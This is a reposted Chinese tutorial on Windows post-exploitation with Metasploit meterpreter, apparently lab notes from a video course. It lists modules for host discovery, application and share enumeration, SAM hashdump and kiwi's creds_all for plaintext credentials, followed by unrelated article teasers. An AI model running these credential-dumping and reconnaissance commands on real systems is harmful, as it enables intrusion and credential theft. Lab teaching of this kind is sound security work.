12.6、后渗透测试--Windows系统下信息收集模块

news2025/2/21 19:36:32

一、存活主机发现

步骤1、使用arp查看缓冲表：

meterpreter > arp

步骤2、局域网内存活主机发现：

meterpreter > run post/windows/gather/arp_scanner RHOSTS=172.16.0.0/24

二、应用程序枚举

方法1：获取靶机上的软件安装信息

meterpreter > run post/windows/gather/enum_applications

靶机上安装百度网盘应用后再检测：

方法2：获取靶机最近访问过的文档、链接等信息

meterpreter > run post/windows/gather/dumplinks

三、查看最近登录的用户

meterpreter > run post/windows/gather/enum_logged_on_users

四、查看共享文件

靶机上查看共享：

kail攻击机上： meterpret > run post/windows/gather/enum_shares

五、查看用户hash

机制：从SAM数据库导出密码的哈希

方法1： hashdump

方法2： meterpreter > run post/windows/gather/hashdump

得到用户的密码与对应的hash值。

六、查看usb历史记录

meterpreter > run post/windows/gather/usb_history

没有usb设备使用记录。

给靶机添加一个usb设备：

此时，再查看usb历史记录：

七、获取用户明文认证信息

加载模块： meterpret > load kiwi

查看指令集： help

获取所有认证信息：creds_all

八、参考

4-30 后渗透测试实验 - 主机敏感信息泄露防御_哔哩哔哩_bilibili

4-31 Windows系统后渗透测试常用模块 - 主机发现_哔哩哔哩_bilibili

4-32 Windows系统后渗透测试常用模块 - 应用程序枚举_哔哩哔哩_bilibili

4-33 Windows系统后渗透测试常用模块 - 收集信息_哔哩哔哩_bilibili

4-35 Windows后渗透测试插件-获取用户明文认证信息_哔哩哔哩_bilibili

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.coloradmin.cn/o/87526.html

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈，一经查实，立即删除！

相关文章

免费刷题的软件测试面试题库小程序，萌新必备

免费刷题的软件测试面试题库小程序，萌新必备

现如今，不仅学习卷、考证卷，就连找工作也开始卷得没边了。就如最近几年新崛起的软件测试岗位，很多人为了能过快速通过面试，或者拿到offer，纷纷在面试前几周左右，不惜花重金，购买面试题目&#x…

阅读更多...

【总结】有三AI所有原创GAN相关的学习资料汇总（2022年12月）

【总结】有三AI所有原创GAN相关的学习资料汇总（2022年12月）

GAN的研究和应用在这几年发展可以说是非常迅猛，无疑是这几年深度学习计算机视觉领域里落地性最酷的技术之一，包括图像与视频生成，数据仿真与增强，各种各样的图像风格化任务，人脸与人体图像编辑，图像质量提升…

阅读更多...

高分子PEGDBCO-PEG-Acrylates，DBCO-PEG-ACRL，二苯并环辛炔PEG丙烯酸酯

高分子PEGDBCO-PEG-Acrylates，DBCO-PEG-ACRL，二苯并环辛炔PEG丙烯酸酯

●外观以及性质： DBCO-PEG-ACRL产物呈固体或粘性液体，取决于PEG分子量“点击化学"一般由叠氮化物（azide）和炔烃（alkyne）作用形共价键，具有高效稳定，高特异性等优点。反应不受PH…

阅读更多...

【Vue 快速入门系列】Vue中如何使用动画与过渡

【Vue 快速入门系列】Vue中如何使用动画与过渡

文章目录前言一、回忆css3中的动画二、Vue中单标签使用动画1.默认使用方法2.自定义使用方法三、Vue中多标签实现动画效果四、使用第三方动画前言本篇博客将会介绍如何在Vue中使用动画效果。一、回忆css3中的动画定义一个动画： 定义一个动画名为atguigu keyfr…

阅读更多...

WhatWeb 网站指纹识别软件

WhatWeb 网站指纹识别软件

一、WhatWeb介绍 WhatWeb是一个开源的网站指纹识别软件。WhatWeb识别网站。它的目标是回答“那个网站是什么？”这个问题。WhatWeb可识别Web技术，包括内容管理系统（CMS），博客平台，统计/分析包，Ja…

阅读更多...

数据库原理及MySQL应用 | 数据库安全加固

数据库原理及MySQL应用 | 数据库安全加固

数据库安全至关重要，可从多方面对数据库进行加固。数据库安全怎么强调都不过分，可以从以下方面对数据库进行加固，让它更安全。 01、操作系统级别可从以下七方面实现操作系统级别的安全加固。 1. 使用数据库专用服务器使用专用的服务器…

阅读更多...

《大数据导论》之数据生命周期和数据使用

《大数据导论》之数据生命周期和数据使用

1 数据生命周期数据都存在一个生命周期，数据生命周期是指数据从创建、修改、发布利用到归档/销毁的整个过程。 1.1 数据生命周期管理工作包括以下几个方面： 分类：对数据进行自动分类，分离出有效的数据，对不同类型数据…

阅读更多...

【MySQL】数据库基础知识汇总和增删改查操作

【MySQL】数据库基础知识汇总和增删改查操作

【MySQL】数据库基础知识汇总和增删查改操作文章目录【MySQL】数据库基础知识汇总和增删查改操作1.数据库基础知识:2.对数据库的相关操作:2.1.显示当前所有的数据库, show databases;2.2.创建数据库, create database 数据库名;2.3.选中数据库, use 数据库名;2.4.删除数据库, …

阅读更多...

基于腾讯云的艺术展小程序

基于腾讯云的艺术展小程序

第一章项目背景 1.1 项目简介和应用现状基于腾讯云的艺术展小程序：打造集美术鉴赏、艺术科普、当代优秀艺术品交流多功能融艺术性、知识性、趣味性、便利性于一体的一站式平台，为广大艺术爱好者提供优质服务！小程序前后端完整&#xff0c…

阅读更多...

特别活动丨HuggingFace工程师教你HF的正确打开方式

特别活动丨HuggingFace工程师教你HF的正确打开方式

主题： HuggingFace的正确打开方式时间： 2022年12月15日（周四） 20:30-21:30由北京智源人工智能研究院主办的2022大模型创新论坛正如火如荼进行中，论坛包含训练营、峰会、创业大赛、黑客马拉松、闭门研讨会、创新应用榜单…

阅读更多...

Python数据标准化

Python数据标准化

【小白从小学Python、C、Java】【计算机等级考试500强双证书】【Python-数据分析】 Python数据标准化选择题以下python代码结果错误的一项是? import pandas as pd import numpy as np from sklearn import preprocessing myDatapd.DataFrame({C1:[-1,-3,-5]}) p…

阅读更多...

Moonbeam与Hyperlane之间的跨链互连合约

Moonbeam与Hyperlane之间的跨链互连合约

跨链通信除了作为Moonbeam的核心，也是为何另一个跨链协议Hyperlane部署于Moonbeam之上的原因。与先前介绍的跨链协议Axelar和LayerZero类似，Hyperlane允许开发人员编写可以跨区块链通信的智能合约，并让开发人员可以在Moonbeam上构建&#xff…

阅读更多...

Linux中可用于监视磁盘使用情况的命令行实用程序

Linux中可用于监视磁盘使用情况的命令行实用程序

df命令 df是一个Linux命令行实用程序，用于监视Linux磁盘使用情况。df命令显示文件系统磁盘使用情况详细信息的完整摘要。通过-hT选项，它以易于阅读的格式显示有关文件系统、类型、磁盘总大小、已使用容量、剩余容量，使用率以及磁盘安装位置等…

阅读更多...

基于DOA联合TDOA时间积累的二维GDOP仿真分析

基于DOA联合TDOA时间积累的二维GDOP仿真分析

up目录一、理论基础二、核心程序三、测试结果一、理论基础无人机(UAV)因其体积小,灵活性高,成本低等优势得到快速发展并被广泛应用于军事战争,城市管理,民用,地质,抢险救灾等各个领域,与此同时,无人机定位技术也得到了深入研究,其中无线电探测与定位技术备受众多学者关…

阅读更多...

liunx常用命令适用了centos stream9

liunx常用命令适用了centos stream9

最近刚好需要重新再学习一下Linux然后开始学习大数据，就重新再温习一下Linux，然后需要把个人所有的编程环境和数据库变成linux版本，虽然一直以来都是用win系统做数据，但是liunx系统的安全和快速最近试了一下确实令我着迷。 liunx常…

阅读更多...

[附源码]Nodejs计算机毕业设计基于web的教学资源管理系统Express(程序+LW)

[附源码]Nodejs计算机毕业设计基于web的教学资源管理系统Express(程序+LW)

该项目含有源码、文档、程序、数据库、配套开发软件、软件安装教程。欢迎交流项目运行环境配置： Node.js Vscode Mysql5.7 HBuilderXNavicat11VueExpress。项目技术： Express框架 Node.js Vue 等等组成，B/S模式 Vscode管理前后端分…

阅读更多...

JSP ssh流量充值系统myeclipse开发oracle数据库MVC模式java编程计算机网页设计

JSP ssh流量充值系统myeclipse开发oracle数据库MVC模式java编程计算机网页设计

一、源码特点 JSP ssh流量充值系统是一套完善的web设计系统（系统采用ssh框架进行设计开发），对理解JSP java编程开发语言有帮助，系统具有完整的源代码和数据库，系统主要采用B/S模式开发。开发环境为TOMCAT7.0,Myec…

阅读更多...

Spring MVC学习 | 使用域对象共享数据

Spring MVC学习 | 使用域对象共享数据

文章目录一、回顾域对象二、在request域共享数据2.1 使用ServletAPI2.2 使用ModelAndView对象2.3 使用Model对象2.4 使用ModelMap对象2.5 使用Map集合2.6 Model、ModelMap和Map的关系2.7 使用域对象的底层原理三、在session域共享数据四、在application域共享数据学习视频&…

阅读更多...

SpringBoot 替换 if 的参数校验

SpringBoot 替换 if 的参数校验

简单使用 Java API规范(JSR303)定义了Bean校验的标准validation-api，但没有提供实现。hibernate validation是对这个规范的实现，并增加了校验注解如Email、Length等。 Spring Validation是对hibernate validation的二次封装，用于支持spring…

阅读更多...

Windows 禁用驱动签名方式

Windows 禁用驱动签名方式

Windows 禁用驱动签名方式1. Windows开启测试模式2. 强制禁用2.1 Win7、Win82.2 Win103. 开机选用强制开启禁用签名模式3.1 Win72.3 Win8、Win10及Win113. 参考1. Windows开启测试模式以管理员模式启动cmd，输入以下命令： 开启系统的测试模式 bcdedit …

阅读更多...

推荐文章

最新文章